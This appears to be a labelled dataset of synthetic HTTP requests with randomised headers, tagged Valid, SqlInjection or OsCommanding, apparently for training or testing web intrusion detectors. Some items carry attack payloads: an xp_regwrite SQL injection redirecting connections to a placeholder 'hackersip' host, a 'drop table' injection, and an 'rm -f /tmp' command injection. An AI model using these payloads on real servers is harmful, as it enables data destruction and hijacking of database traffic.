Start - Id: 5253
class: Valid
PUT /lfQAG2uRG9H/9dlo9rwndee/qoyHWmh19wBHZOd/an5FnYvWQWk/cpuorhtsmeh3mh7ObV6e/64Ax-M/sFGfwaV/KHaccess_log6Unmetau/ex4o9OfIJ/I0PIwTJxMstdinG.asp? HTTP/1.1
Content-Length: 210
Content-Language: nttcuptx,hcssa
Content-Encoding: deflate
Content-Location: /qcmds.png
Content-MD5: b25pbkVld2FHZW5zQnRtbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 02 Jan 10 13:11:37 UTC
Last-Modified: Sun, 27 Jun 04 09:16:27 CET
Host: www.q6cnrww.gov
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-icelandic, iso-8859-2, x-mac-korean;q=0.1, x-mac-greek
Accept-Encoding: *
Accept-Language: eaiheyo-Citoiand
Cache-Control: max-age=34
Client-ip: 176.242.175.221
Cookie: rsec=e]stiSenrupdatet
Cookie2: $Version="40"
Date: Wed, 22 Jun 05 14:49:32 GMT
ETag: "Q9wBF0sGQY7tVsFK"
Expect: Nsdwtoa
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Tue, 27 Dec 05 08:04:01 GMT
If-Unmodified-Since: Sun, 02 Jul 06 10:01:06 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Feb 10 24:18:52 UTC
Max-Forwards: 111
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM Z2ZmYnRncmFhdGVyRml0aXNlcmR1QzdsZHJ1cGR1OE5wYWVodG0=
Authorization: xnnt8 th9sth=nnemtle
Range: -061
Referer: /6nf4ooc.png
TE: trailers
Trailer: Trailer
User-Agent: eePvetttae
UA-CPU: 68000
UA-Disp: 507,781,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4414x768
Via: FTP/3.0 136.183.51.127, HTTP/4.7 www.ltnutn.htm, HTTP/2.2 www.nnms.jpg
Transfer-Encoding: deflate
Upgrade: tMhm/1.0, C7euh/3.4
Warning: 526 www.cbflN.html "hsea" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 76349451666157165
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

dsieG4=je-accept~&dst0zrv=l7_CU_k&dTu=8mxs4tAD&ekesrqeuehh=fhtLesri updatel&esakruza=t&ucec4tp8=en ih&u9isfesdu=20&bLIY_vB.=r&nieaetlxlebtll=3e>&SooTtmp=3501674&sresaepWeeaoidL=dja1id dpn&sHe9i4nrnrbtmr=005

End - Id: 5253
Start - Id: 41012
class: SqlInjection
POST /tateaCsnhE7ot78s/9hM8@/rfrTigso/eQLL-oidJQ0DcSdJW/xm@HPOmvi9LKdpWHTvR/agPf-u/hPO8g7ztYhW/lmlsw9hnT/s0uWXEL.Z8gC-/o@k5OKGRW_8e.sh? HTTP/1.1
Content-Length: 322
Content-Language: e5,aIf
Content-Encoding: identity
Content-Location: /iliwzlo6/Rurs/ecaBosl.nsf
Content-MD5: YXJlbHJlaWJFbnVlZW9mcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Jun 07 06:04:35 UTC
Last-Modified: Mon, 31 Jan 05 21:02:05 CET
Host: www.eeicfrnzh.gov
Connection: close
Accept: audio/basic, audio/x-wav
Accept-Charset: euc-tw, x-mac-cyrillic;q=0.4, windows-1250, hz-gb-2312
Accept-Encoding: deflate
Accept-Language: oiruoie-hepiyne
Cache-Control: no-transform
Client-ip: 168.241.203.79
Cookie: cl74agnripjeav=85759520;rh=44760;dmSoStOw=g
Cookie2: $Version="131"
Date: Wed, 07 Apr 04 11:22:26 GMT
ETag: "J9oOxUDDW36cel@qM"
Expect: 100-continue
From: tdvu@drRtsel.org
If-Modified-Since: Sun, 12 Dec 04 09:36:24 UTC
If-Unmodified-Since: Fri, 22 Jul 05 11:02:15 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Jul 06 23:25:34 UTC
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: stso6 ogso9=thaamu
Authorization: Digest uri=/unEi1at/na7irijs/csts.jsp
Referer: http://94ewe.biz/htnnn/ivitn31s/jsbehoaf.php4
TE: deflate
Trailer: Expect
User-Agent: ocnse5nNaete8Faiil
UA-Disp: 856,630,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 892x2342
Via: 9.1 204.101.191.39:95704, FTP/4.1 170.126.25.12
Transfer-Encoding: gzip
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 134.103.78.204
X-Serial-Number: 3513776009500054162
----: ---------------
~~~~~: ~~~~~~~~~~~~

tniltateudftm=io&hnoDoyIgZoddoid=8hAftshtqf&wjpywelwm=3237&aoaZwrhjq=nyk@VgQc9jzh&5m0ofv0=75880&Ide2diddrrha=exec  xp_regwrite  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','toh','REG_SZ','DBMSSOCN,hackersip,80'&yhhnprbrooprya=9575045302&4xsst0Cu=4584241

End - Id: 41012
Start - Id: 17075
class: Valid
GET /eBsZ-qtvc4y-/tcBhtattrs/nerucyjytmNsaea2cma/hhMntb2/bxE_sDA1c/9aShonsiuz/iE8At4dZ/-WquidTQj/h1Im4uW@Zz939CQ8bmH.css? HTTP/1.1
Host: www.eeslte.net:7
Connection: hn3l
Accept: text/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eur-aRr
Cache-Control: max-age=5
Client-ip: 187.180.35.173
Cookie: ooirtinurbhesm6=tsmhucho-6g?ite;siwoebt=8V-Bn0.
Cookie2: $Version="908"
Date: Wed, 02 Apr 08 23:26:57 GMT
ETag: "9h8i-WTEHWebHCHr6-q"
Expect: uysn=4XBe
From: mjsOfho@efDme.uk
If-Modified-Since: Mon, 16 Feb 09 09:40:57 GMT
If-Unmodified-Since: Mon, 27 Aug 07 14:49:35 CET
If-Match: "fyDGnpd@kTD7UOWZNqs"
If-None-Match: "zuuvRc6eYbChOlH"
If-Range: Wed, 29 Aug 07 19:36:19 GMT
Max-Forwards: 08
MIME-Version: 4.5
Pragma: gmtii=uonmy
Proxy-Authorization: Basic aHZzaGRuaU46cndvdGFk
Authorization: Digest opaque="2ttca"
Range: 36592-9391,93359-42748,61842-4696
Referer: /oh7xeg.jsp
TE: trailers
Trailer: User-Agent
User-Agent: atzua/9.3
UA-CPU: StrongARM
UA-Disp: 7520,867,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9333x8933
Via: myp/4.7 13.99.84.161:008, 6.9 www.aswl.js, HTTP/9.1 145.202.39.220
Transfer-Encoding: identity
Upgrade: nuti/7.7, 4TEs/2.1, 4nqais/2.3, baaiD/4.1
Warning: 191 166.68.140.162 "eaVlncoAlolfhrlu" "Fri, 18 Sep 09 07:53:36 CET"
X-Forwarded-For: 185.99.110.242
X-Serial-Number: 7467351348661149329
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17075
Start - Id: 22255
class: Valid
GET /iigph5tl6aHdW/ca/shoxrlm6sfeL9d/wD/KZ1k9hhtpassEshutdownawindow.open.htm?fg8rbHs=99706748&SHMuanetcat4wRGwQ=+ne&wjvNboot.ini=ea&am=ftsaacaaoiThoeO&etsOndsrT4dz=lsanjrE&fuz=30&nTuhbda=70&2oOrbusIt=1&picto=wuepEeyyriWc&Tnugdi=onsthiAuia HTTP/1.0
Host: www.hAh0r3wx.cz
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Wao-rp, 2v9it-gEvLa;q=0.6
Cache-Control: only-if-cached
Client-ip: 62.159.240.239
Cookie: Ow.uEs.q= h;oSrEjnn3s=13565019;nasaLsxnns0lai8=t;Msecoolt3M=Reibodyraccept $aftp-0a;id-;hf7ilndRdyce=Rnel3T;oe=adpa rx
Cookie2: $Version="6"
Date: Wed, 14 Jan 09 10:23:52 GMT
ETag: W/"mTPGsM5liPmK3wm"
Expect: 100-continue
From: orEtts@ismhaeter.de
If-Modified-Since: Mon, 12 Jan 09 08:33:25 UTC
If-Unmodified-Since: Wed, 24 Jan 07 11:43:47 CET
If-Match: *
If-None-Match: *
If-Range: "mVPU@8AFrXYS76X9"
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: ngoFt8 taaec=t7nymEoi
Authorization: NTLM cnRtaWFpbWIwYU9kMnI1bGRjeXQxaHRqaWhlRmlrbmJzdXRrbW96OWdybw==
Range: 00-
Referer: http://enhkwgz.ch/lmpx1iao.swf
TE: trailers
Trailer: Warning
User-Agent: 62iswtst/0.0
UA-CPU: MIPS
UA-Disp: 204,827,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 196x167
Via: 7.4 www.fz1w.css, atetg/6.8 www.bepiAuat.html, HTTP/8.2 183.174.224.113
Transfer-Encoding: gzip
Upgrade: ktl/3.4
Warning: 047 www.paolls.html "neige1nwahS5sseaami" 
X-Forwarded-For: 204.223.4.134
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22255
Start - Id: 23627
class: Valid
GET /gSDAoLLqZ-KN1/ouQ5EYy/eh/ldnaruFen8tIdnLt5/ubetweencsAoi/ehtsMcteqq/khtojnd1dNaiagPnte4o/tcKxqOKJKOj1pOuqhz.mdb?copyDevalinm=+oacceptsnSsmetagrs&ieavs=nIaa+So&twbaRra=gtR4nob&4s2t=oia%3Fha&t1tSgk=szW&i@GrqiEexecyc=tntelnetco0dl%3Eet&c2ewginLpe=1&iOnEgjtk=t&usaihwto=slsnrwhCiJD&R4ls2passwdscriptgtei=1590593&upvgcmevade7gt=000488546&htNi=odqa7eeudimh8eSH&orddl3o2=et%29teror&childpY3sO@2j9=99478384 HTTP/1.1
Host: www.keiox.org
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-874;q=0.5, us-ascii;q=0.6, iso-8859-6, x-mac-cyrillic;q=0.2, euc-tw;q=0.0
Accept-Encoding: compress;q=0.7, compress;q=0.8, compress;q=0.8, deflate;q=0.3
Accept-Language: *
Cache-Control: Aatinl=ct
Client-ip: 88.47.180.4
Cookie: ssI6lfieuTo=03204;IYun8er=noe;.ecDR5=1nhp;dlmhLhosotpdlIm=ltJEqJ
Cookie2: $Version="41"
Date: Tue, 28 Sep 04 04:51:38 CET
ETag: W/"5vue@uU-VjIDl2KAu_P"
Expect: 100-continue
From: emWo@1nea.net
If-Modified-Since: Tue, 14 Apr 09 11:35:15 GMT
If-Unmodified-Since: Mon, 01 Mar 04 15:08:29 CET
If-Match: "3bNKqjiIIiVpJ6zwmu."
If-None-Match: *
If-Range: "kgWx5IB-dbvyiUjuF"
Max-Forwards: 469
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM c2l0ZXlhZXJyZXVycm91dGRlUklPdGluMHRyaWN0bm90cnI3Nm0=
Authorization: Digest qop=auth
Range: -883,871529-,-45
Referer: http://www.powg8.fr/Th3o.aspx
TE: deflate
Trailer: From
User-Agent: ii5islwepa1cHCsQhi
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 361x375
Via: 9.2 233.18.143.125
Transfer-Encoding: compress
Upgrade: gktu/1.0, isTtr/8.1
Warning: 398 www.tooa.css:63777 "eytbc" "Tue, 06 Sep 05 04:00:11 UTC"
X-Forwarded-For: 151.73.41.255
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23627
Start - Id: 35413
class: SqlInjection
GET /oOIFT2IkWSHuEyTe/Itjao/imgII/cT3N@0ySgaSv/ZCOdUnMAo/tLIXXQ-UAM.exe?bDyaeervnoiouo=qfideg+&50CpoyaaNt3=14897&tsJRhe6=eL&Czhhtpassx=lmvlipuslhlsam%3C%5BhCceAt&le7=8499&hu7lbcnude=2152112&rsplarIve=rsid&rlamm3=ctsgqrrglAxe&oye4paCsaio=pwaliba&hekir47elyotmh=%27%3B+drop++++table++++eheufeTeeilX&d8=selectq&ihepb22dunpHe=wkojffT&disiHilrtrt9n=akk&lih4ej9cltl=-tryen6aegast HTTP/1.1
Host: www.nschtd0lo.com
Connection: dFdtbi
Accept: application/*
Accept-Charset: isiri-3342;q=0.5
Accept-Encoding: deflate;q=0.2, deflate;q=0.5, gzip;q=0.1
Accept-Language: *
Cache-Control: max-age=52
Client-ip: 67.105.71.5
Cookie: replaceCyMrcpbYJ=srta7ttduurten;meetNmS9dssb=nskp4qdq;RyPmhTMbNxI6=5013294757;hxtdloxyeaG=hD3eB6.
Cookie2: $Version="1"
Date: Tue, 05 Aug 08 08:29:50 CET
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 0tsatea
From: meCo6@c0Onn.it
If-Modified-Since: Sat, 27 Mar 10 04:55:20 CET
If-Unmodified-Since: Thu, 25 Feb 10 24:32:53 GMT
If-Match: *
If-None-Match: *
If-Range: "71sJhQ_j41GbmmWwkj"
Max-Forwards: 28
MIME-Version: 4.3
Pragma: et=Hiyii65
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: Digest algorithm=MD5-sess
Range: -236
Referer: http://Tn2oae1t.de/s1SxESea/wdosfL9/igent3e/TYa7/semA6o.conf
TE: deflate;q=0.6,deflate;q=0.8,deflate
Trailer: Host
User-Agent: rCtq76Np92 http://www.tretyusp.net
UA-CPU: 68000
UA-Disp: 8983,827,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 0.6 47.142.37.237
Transfer-Encoding: 9eni
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 292 225.163.120.85 "z0feceldn" "Sat, 14 Oct 06 01:35:25 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35413
Start - Id: 27820
class: Valid
GET /efa6C@Wt@lzePb/TB2/ob/q4gqkU0eq/xiuCpnyzadIeil/dujTz5FK/rthxar72smeeaLu.html?e2D3tedD=di980nf%40n&aboeestgkot=7toeib6dnhnNanbjt6&aiT82tn=9&i5Risein7nm=6-&fzttEr5ftnr=rou4denntacuAiSt&xPa0=319 HTTP/1.1
Host: www.asbezdsaSt.st:30
Connection: plpla
Accept: video/mpeg;q=0.0, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Kwmdrht-Gmtu2aln, revtdh-e;q=0.4, teLee7-ne7h8;q=0.3, Deertf-60aptTa;q=0.8, 1dujd-oetge;q=0.0
Cache-Control: max-age=3881
Client-ip: 102.45.50.188
Cookie: TByihNb=1476
Cookie2: $Version="51"
Date: Wed, 22 Apr 09 13:05:48 UTC
ETag: "BE-hvVdIQ08mEqst6JOc"
Expect: 100-continue
From: Iaitkel@rOtuy.it
If-Modified-Since: Wed, 14 Nov 07 03:33:16 UTC
If-Unmodified-Since: Wed, 27 Jul 05 18:14:30 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Oct 05 22:45:35 GMT
Max-Forwards: 498
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic bWlpZTpzOGNl
Authorization: gL7a Tdtbasw=4EUjtv2
Range: -84,186-,1747-
Referer: http://e0nun7.org/dasr/ntljxt/Tefjt/alnst/hbercbn.tiff
TE: deflate,deflate;q=0.7,trailers
Trailer: TE
User-Agent: 6IeZi/9.0.9.2.1
UA-CPU: x86
UA-Disp: 626,6964,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 370x5547
Via: FTP/8.5 25.157.97.99
Transfer-Encoding: compress
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 27.223.128.62
X-Serial-Number: 9975716182184282861
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27820
Start - Id: 13500
class: Valid
GET /qexec.php4?tem7tse=ersinputrbodyuitcllapwinnt&4gnEs=5865&0tlll=9etea&prw=iv9Un&as6iyie=173&6oelNlSanu1=02742&aeneei1a=Xudkoetcme HTTP/1.0
Host: 77.36.76.9
Connection: keep-alive
Accept: image/jpeg;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: eSeaI-x;q=0.1, vdttIla3-r
Cache-Control: min-fresh=04
Client-ip: 180.68.206.0
Cookie: sa7rde=d6ueN;ck03mitse=aG;ghmr8=80;9zjK_HUstdin48.=hrzh3eraaccess_logEgcopyvary
Cookie2: $Version="03"
Date: Tue, 04 Apr 06 14:49:48 GMT
ETag: "DK3ulFf1b1kma5xmF"
Expect: 100-continue
From: netoed@RhSevedeen.ch
If-Modified-Since: Thu, 30 Aug 07 06:06:57 CET
If-Unmodified-Since: Wed, 20 Jun 07 07:26:18 GMT
If-Match: *
If-None-Match: "X3eO8Ek.gFTBsk_"
If-Range: Mon, 15 Jan 07 11:59:59 CET
Max-Forwards: 40
MIME-Version: 8.8
Pragma: gAcs='evi'
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: Digest nonce
Range: 81977-983962,396-,08380-3287
Referer: http://www.oAmae.de/nreh.dll
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/7.1 (X11; U; SunOS sun4u 7.8; ra-ec; rv:9.2.5) Gecko/55103545
UA-CPU: x86
UA-Disp: 908,0638,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: 3.0 163.240.41.152:95, Rtw/0.8 99.64.229.81, HTTP/5.3 148.73.108.147
Transfer-Encoding: gzip
Upgrade: sldtn/3.8
Warning: 109 178.4.211.203 "uhlowDrttArs" "Fri, 26 Feb 10 23:40:50 GMT"
X-Forwarded-For: 43.46.247.235
X-Serial-Number: 44417038819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 13500
Start - Id: 16165
class: Valid
GET /xgg33CQYVGbyq/aclOvd3/i0r8aicfr9oemiIq/-wL0RCtkulnscripteS.tiff?Rhypca=186908&emeihbrp=e4o&6taL=5712&qe5fottrrlsrN=3&1EUmh=ahe&vacattmpDnodeg=80643&tri=7sbkbN70sp&ieuorTnsX92l=071uace+tbh HTTP/1.0
Host: www.tlnr.net:80
Connection: close
Accept: text/*, audio/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: ihtu-0oistrt;q=0.3, Eeeeea-lhhi;q=0.4, oeAvge-nsne9n6;q=0.3, Ao3etx-eAtjhe;q=0.0, o-pa
Cache-Control: no-cache
Client-ip: 163.65.92.102
Cookie: smleuein=l ;trpeyA5asdd=nELfc;zsystembCu=i;terla=:+otilitjw n6e2d;Eea=allvar]e
Cookie2: $Version="737"
Date: Fri, 05 May 06 18:02:06 GMT
ETag: "RPeD2251fsD7P4nBAkey"
Expect: 100-continue
From: mEck5@aosi.it
If-Modified-Since: Sat, 26 Aug 06 24:16:00 UTC
If-Unmodified-Since: Tue, 16 Mar 04 08:52:57 GMT
If-Match: *
If-None-Match: *
If-Range: "f58y7ul1uVdgUuMO"
Max-Forwards: 407
MIME-Version: 7.0
Pragma: Dbiaoyi='ehh'
Proxy-Authorization: Digest username="nFeSct7"
Authorization: eTnft 6oio6=cetm
Range: -0401,-5888,85828-61
Referer: http://hie4int.ch/34rooi/aDwuOO1o/HrzaaE/8mveep.png
TE: deflate;q=0.6
Trailer: Accept-Encoding
User-Agent: Mozilla/4.2 (compatible; MSIE 8.7; SunOS sun4u; ydhqalao)
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: FTP/7.0 www.e3upy9e.tiff, 1.5 193.84.239.182, 7h5cw/0.4 242.245.55.87
Transfer-Encoding: gzip
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 823993
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16165
Start - Id: 43472
class: OsCommanding
GET /h_Ibozl5ss7Icat/5glgnile/tv6iL5AiMMO8r0d/dnxsEmouhssdenscark.htm?Cle9rit=rm+++-f++%2Ftmp%2Fyetsti+++%7C&enr=8410&3hbh4odosnla7=7RkNhElbs&SJ981OSXlikeNT=76265&aiUsSEwoo2R=OmoeugnW1&fey=ularyzonogim&cH@6hCEM4=N1epnymaionht&aKy0TcDF=4234799&emoRsHdhJo=tei&Z5unionIbzQ5=c HTTP/1.0
Host: 131.24.159.225
Connection: close
Accept: text/*, video/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: oOe3-lo, hdlhfnsd-w;q=0.3, 2yeeueef-anVAi, 7elm-Nreeg, Odr10-iayEa;q=0.6
Cache-Control: no-cache
Client-ip: 5.223.71.17
Cookie: 40objectwhereAUe3=445;oeta9ssb7gfl9=Tpgas
Cookie2: $Version="2"
Date: Fri, 01 Feb 08 11:11:06 GMT
ETag: "@fPzhxW9_YYM79hlWi"
Expect: dems0=eoao;ydeli
From: t3bs@fsiaebtorf.it
If-Modified-Since: Sat, 11 Jun 05 23:14:32 UTC
If-Unmodified-Since: Fri, 14 Jan 05 12:18:01 UTC
If-Match: *
If-None-Match: "@vpav.5.eGQq70-hJS"
If-Range: Tue, 02 Nov 04 09:59:58 UTC
Max-Forwards: 82
MIME-Version: 5.4
Pragma: g8rIdnms=TaddltT
Proxy-Authorization: Digest username="ncuenm"
Authorization: Basic dzNzMmFjOmVocG5tTmI=
Referer: http://8egkfe.biz/leonx/6sAktezk/slh0e/lkmraS/swoyeh.pdf
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.7 (X11; U; Open BSD i386 1.5; Ao-rn; rv:6.5.3) Gecko/32222440
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 333x8954
Via: 5.9 www.nnlghe.gif
Transfer-Encoding: deflate
Upgrade: nsae/6.6
Warning: 666 166.163.91.248 "reqnetwydVCbEhnmif" "Thu, 16 Oct 08 05:40:51 UTC"
----: -----------------------------

null

End - Id: 43472
Start - Id: 33569
class: Valid
PUT /etNE4s3ttcdhfe/hG.DscjY/7xmBBS66C9/hMSfooro/DI0/gS_CDACJAedBKv/eV.Cj-O4kWUJx/VgqPftpM4autoexec.jpeg? HTTP/1.1
Content-Length: 134
Content-Language: brpzge,v,wks8c4np
Content-Encoding: deflate
Content-Location: /hifetsic/nzspe/qnrc9.mpg
Content-MD5: aW5sYXJ2bmFzZTJhaXRwdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Feb 10 14:07:31 GMT
Last-Modified: Fri, 24 Aug 07 08:19:04 CET
Host: www.io5tmM.uk:18
Connection: y3htn
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: ieZu-iaee8thg, rEnamtor-n;q=0.0, hes2eut-qin92;q=0.9, f6-fnscc;q=0.0
Cache-Control: no-transform
Client-ip: 241.250.45.10
Cookie: aSirogo5b=sO6u@yiKb2kR;DO0dBTwp=pzT
Cookie2: $Version="0"
Date: Sat, 25 Oct 08 10:01:45 GMT
ETag: "CLmOtc0eXUXje2uC"
Expect: sqej2
From: nndz@n7ls.fr
If-Modified-Since: Sun, 07 Nov 04 19:40:04 UTC
If-Unmodified-Since: Mon, 25 Jun 07 15:49:58 CET
If-Match: "@cNIXAXyqgQK6uPK"
If-None-Match: "OcKCO_XZC3.-Ss0rD-ar"
If-Range: Tue, 06 May 08 05:06:33 CET
Max-Forwards: 4976
MIME-Version: 7.8
Pragma: bcoor='er'
Proxy-Authorization: 04aage ra4ttt=w2Glsaa
Authorization: Digest uri=http://runtjske.org/ette/doan.mdb
Range: -65580,016-
Referer: /Gebin/rttEraah/aasvve/toor5T/xostv.cgi
TE: chunked;q=0.2,trailers
Trailer: TE
User-Agent: egfei2dhes1teu
UA-CPU: PowerPC
UA-Disp: 4987,665,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 417x756
Via: 2.7 www.cesd.gif, 7.3 www.adtOtxc.jpg, 8.7 www.eete.gif
Transfer-Encoding: identity
Upgrade: seaotb/4.9, Cnb/7.8, ikhrhe/2.2
Warning: 904 254.251.47.53 "9tyslbOtj" "Fri, 25 Nov 05 09:55:02 UTC"
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 634432406284219
----: -------------
~~~~~: ~~~~~~~~~~~

inl@qkGtbZX=6813&sZcformform52=737&egp62q3ybrgcEp=262706&nseq=@oibcs3hl&oe=tw&GK.X3sKhpasswda=ie$r Tio&mesTq=from&oopo=ybDe6@UnA

End - Id: 33569
Start - Id: 22549
class: Valid
GET /y1t/pO/0KMQ4qZG4.Ttmpn9/rhh1m8rogoa0dCiwh8t.gif?0Tcswenh=t8bgsoundsh&rt2bnnbtowv9d=aqN&o_ygroup by.3UE-=794&442I-hD-scriptN=hw-vI&retubaoeeu=toe%3D%3Asfrometc%5CUb4texec9e&aEnuscYnDeo=eHt+rsmedai&eoh=Pefnhf1&qb=thnir&llij0rd=759 HTTP/1.1
Host: 252.128.227.16
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-15, x-mac-turkish;q=0.4, us-ascii, iso-8859-8;q=0.0, windows-1250;q=0.7
Accept-Encoding: 
Accept-Language: hTHigig-IrDhRecl, jaA0-sutfio;q=0.4, nfb2uL-ho6y, aoiesOT-m;q=0.3, 3nEUYUd-rrAU;q=0.8
Cache-Control: max-age=97
Client-ip: 22.142.229.14
Cookie: or=tcLDepBk_Fy;sir6bYnearr7l=faomll
Cookie2: $Version="9"
Date: Mon, 30 Aug 04 23:54:40 CET
ETag: "@0LvUf-_j5LDfGb"
Expect: 100-continue
From: tetoseli@i9ihet.it
If-Modified-Since: Fri, 13 Nov 09 22:34:00 UTC
If-Unmodified-Since: Fri, 14 Jan 05 01:45:04 GMT
If-Match: *
If-None-Match: "Qrd.J33vDSSjDkA"
If-Range: *
Max-Forwards: 35
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic dGlyaXQ6dG80ZWFud04=
Authorization: fttbdo hrcP=2rowe
Range: 0879-,909-
Referer: http://Rsfeo.de/hn7n/e3wWem/cio5ee/osWhagrE/snntfet0.fgf
TE: gzip;q=0.4,trailers,gzip;q=0.4
Trailer: Max-Forwards
User-Agent: 70toaeit/6.5
UA-CPU: 68000
UA-Disp: 6653,0057,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1663x456
Via: FTP/8.4 www.zri6t.png, 5.6 228.82.191.170:2464
Transfer-Encoding: gzip
Upgrade: dee/5.9, qfbrt/1.6, eu9ds/0.9, eiadHn/3.8, aZty/3.6
Warning: 484 www.ddtbieae.tiff "8languaiimC2v" "Mon, 01 Oct 07 20:34:48 UTC"
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 47407975
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22549
Start - Id: 6467
class: Valid
POST /7otia.js? HTTP/1.0
Content-Length: 133
Content-Language: a85txtA,8rUton
Content-Encoding: compress
Content-Location: http://dweoiEhI.org/wadehit5/Aoene/8wTly.mdb
Content-MD5: b2VtbWcxY2F0clRFcG9hbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Nov 09 04:31:23 GMT
Last-Modified: Sat, 16 Apr 05 16:22:28 CET
Host: 186.251.231.158:80
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oS-7aynneg;q=0.5, neZ3-Uto, ee-er;q=0.1, qqtasaa-ooaor;q=0.5, w-entn
Cache-Control: max-stale
Client-ip: 136.30.117.88
Cookie: nAtinswptyt=lrtmpliken;wviePs=dmtepAoeshitnfs;nn8df=6ftpeaosemN<e+i;3H5zPH7=oeImegrn;eRi4waea1ytse=0767
Cookie2: $Version="6"
Date: Thu, 27 Jan 05 16:17:04 CET
ETag: "Ld2pWBfbiFOdlQ0fImK"
Expect: meta
From: diea@4erabo.it
If-Modified-Since: Wed, 03 Aug 05 20:14:48 GMT
If-Unmodified-Since: Mon, 06 Dec 04 06:40:25 GMT
If-Match: *
If-None-Match: "LiQO4Dg7zrSC54s2l"
If-Range: "OO0h247amDR7OxicFCwK"
Max-Forwards: 44
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM bWFObDI3bnR0eWRlYTdhcmNhdGlkcGVhb2VpbndjbXRjc3Q=
Range: 35260-775435,47-,92-626366
Referer: /pIhr/n8ser9h/hesn.fgf
TE: trailers,chunked;q=0.5
Trailer: Upgrade
User-Agent: Mozilla/5.5 (compatible; MSIE 9.7; Mac OS X; lraeint; tstereta; eibsewldm)
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7326x597
Via: 2.1 200.167.172.123
Transfer-Encoding: gzip
Upgrade: taosmh/9.6, 7tobm/9.4, ucise/1.4, lnel/8.9, hou/2.5
Warning: 447 37.2.170.213 "8reqteinidDfS9tu7r6" "Mon, 13 Mar 06 18:40:21 UTC"
X-Forwarded-For: 218.75.218.198
X-Serial-Number: 6200132092140474
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

